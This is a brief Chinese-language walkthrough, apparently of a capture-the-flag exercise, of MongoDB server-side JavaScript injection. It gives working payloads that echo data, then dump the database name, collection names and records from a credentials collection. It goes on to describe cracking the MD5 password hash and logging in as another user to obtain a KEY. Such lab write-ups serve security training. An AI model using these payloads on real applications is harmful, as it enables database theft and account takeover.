构造数据回显
'});return ({title:'1',content:'2
成功回显1,2,接下来我们开始尝试查询数据库
'});return({title:tojson(db),content:'2
得到之后我们就可以继续查询他的表名了
'});return({title:tojson(db.getCollectionNames()),content:'2
最后我们就可以爆出他表里的数据了
'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2
得到密码之后,我们就可以获得数据了,先将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。如果第⼀个⽤户账号密码登录不了,我们就改变查询的索引“find()[1]"查询 其他的⽤户账号密码登录即可
这里显示用户已禁用,那么我们就换一个用户
好了这里我们就登录进去了
